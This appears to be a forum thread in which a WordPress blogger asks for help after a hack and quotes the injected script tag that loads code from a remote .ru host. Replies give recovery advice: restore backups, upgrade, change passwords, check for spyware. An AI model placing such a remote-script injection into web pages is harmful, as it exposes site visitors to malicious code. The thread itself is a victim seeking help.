I was Blog Hacked - Help!

by 8 replies
9
Here's the error I'm getting

> <script src=http://dolarptc.hdd1.ru/login.php ></script><?xml
> version='1.0' standalone='yes'?><wp_ajax><response
> action='autosave_522'><autosave id='522'
> position='1'><response_data><![CDATA[Draft Saved at 4:38:43
> pm.]]></response_data><supplemental></supplemental></autosave></response></wp_ajax>

Any ideas how do I remove this script or what to do?

Basically I can't make a new post show its permalink editing field; only the draft will do the trick.
#programming #blog #hacked
  • Try to overwrite your files on the server with your local files on the harddrive...
    • [1] reply
  • I think he means re-install everything.

    And yes, the site listed there is a hack site.
    You will want to find out how they got in or it will happen again.

    PS: Make sure your personal computer is not infected as they may have gained access through you logging in.
  • Restore from backups and move on
  • This is a good example why it makes sense to periodically backup your data.
    My advice it to quickly upgrade you wordpress right away and change your password.

    As someone said above, now that they know your site, they will come back again.

    Good luck
  • Sorry to hear about that - it's a bummer.

    The advice given above is good - and once you've got everything cleared up again don't forget to re-submit your site to Google (which you can do via Google Webmasters Tools).

    This article has some ways that you can tighten up security on your site once it's cleaned up:

    http://www.wealthydragon.com/blog/20...-security-ftp/

    Cheers,

    Martin.
    • [1] reply
    • Usually if you just overwrite the files, your data will remain intact.
      I always use server backups for everything.

      I usually use:
      Code:
      wordpress.org/extend/plugins/wp-db-backup/
      I just found a cool WP plugin that backs up your files to Amazon S3's service, which is a secure storage medium, and is cheap. I have not tried it yet, but plan on it.

      Code:
      wordpress.org/extend/plugins/wp-s3-backups/
      And it's a good idea to use something like roboform to save your login information, they are safe from keystroke loggers, etc.. I've found that most of the hacks I had in the past were from some spyware I didn't know about on my computer letting them have full access to my websites.

      -Brad
Join the discussion

Next Topics on Trending Feed